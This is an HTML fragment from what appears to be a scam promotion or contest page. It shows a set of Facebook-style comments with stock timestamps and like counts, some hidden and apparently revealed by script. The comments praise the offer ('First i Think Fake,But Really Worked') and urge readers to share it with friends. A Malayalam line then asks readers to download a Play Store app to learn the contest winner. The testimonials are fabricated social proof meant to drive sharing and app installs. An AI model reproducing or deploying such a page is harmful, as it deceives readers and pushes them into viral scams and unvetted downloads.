                      <img class="profileimg" height="50" src="//2.bp.blogspot.com/-Rq2k4aORd6U/T3cRHZdf1_I/AAAAAAAAAEI/THV3OV-fRLw/s1600/419270_270037023072055_195981707144254_591735_764504544_n.jpg" width="50">
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Vinod Anand  
                        </span>
                        <br/>
                      First i Think Fake,But Really Worked


                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb6' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/MFEsfnq.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Himani Goel   
                        </span>
                        <br/>
                      All the best .. Thank you   
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb5' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/N42335a.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                         Biju CA  
                        </span>
                        <br/>
                         Thank you !


                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb4' style='display: none; opacity: 1;'>
                      <img class="profileimg" height="50" src="//2.bp.blogspot.com/-RCwD_o-k_2s/U7epgeXLl_I/AAAAAAAABzM/Wuf_AwoRu9k/s1600/3.jpg" width="50">
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                      Roy Malik 
                        </span>
                        <br/>   You should share with your friends to get this promotion!!! 

                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    
                    <div class='item'>
                      <img class='profileimg' height='50' src='https://2.bp.blogspot.com/-gAGvENL2owM/VzsZBIVO0AI/AAAAAAAABgw/Ch_3Q-b23bouuvKidKyNfgAgB_AVDwF_QCLcB/s1600/942533_1768157116745427_524389445094543530_n.jpg' width='50'/>
                      <p class='comtxt'>
                        <span class='name'>
                    Shani Lakshmanan 

                        </span>
                        <br/>
                        Fantastic! Thank you a lot for this


                      </p>
                      <p class='combot'>
                        <span class='ago'>
                       2 min ago
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                        <span class='likes totlikes'>
                          223
                        </span>
                      </p>
                    </div>
                  </div>
                  <br/>
                <div>
				
				
 <div>


<b:section id='fixelements' showaddelement='no'/>




<div class="copy-right">
<div class="subscribe-copy">
<div class="subscribe-slot">മത്സര വിജയിയെ അറിയാൻ ഈ അപ്ലിക്കേഷൻ ഡൗൺലോഡ് ചെയ്യുക...</div>
<div class="subscribe-button"><a href="https://play.google.com/store/apps/details?id=com.mflix.app.tk" target="_blank">
	<img alt="" src="https://freeiconshop.com/wp-content/uploads/edd/google-play-badge-128x128.png" style="width: 362px; height: 204px"></a></div>
</div>

<div class="copy-right-online">Copyright 2020 VClip App. All rights reserved.</div>

<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1577875,"000000","ffffff");</script></center>
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/hit.js"></script><script type="text/javascript">sc_hit(1590851,11,3);</script></center>
</div> 
</div>

</body>
</html> 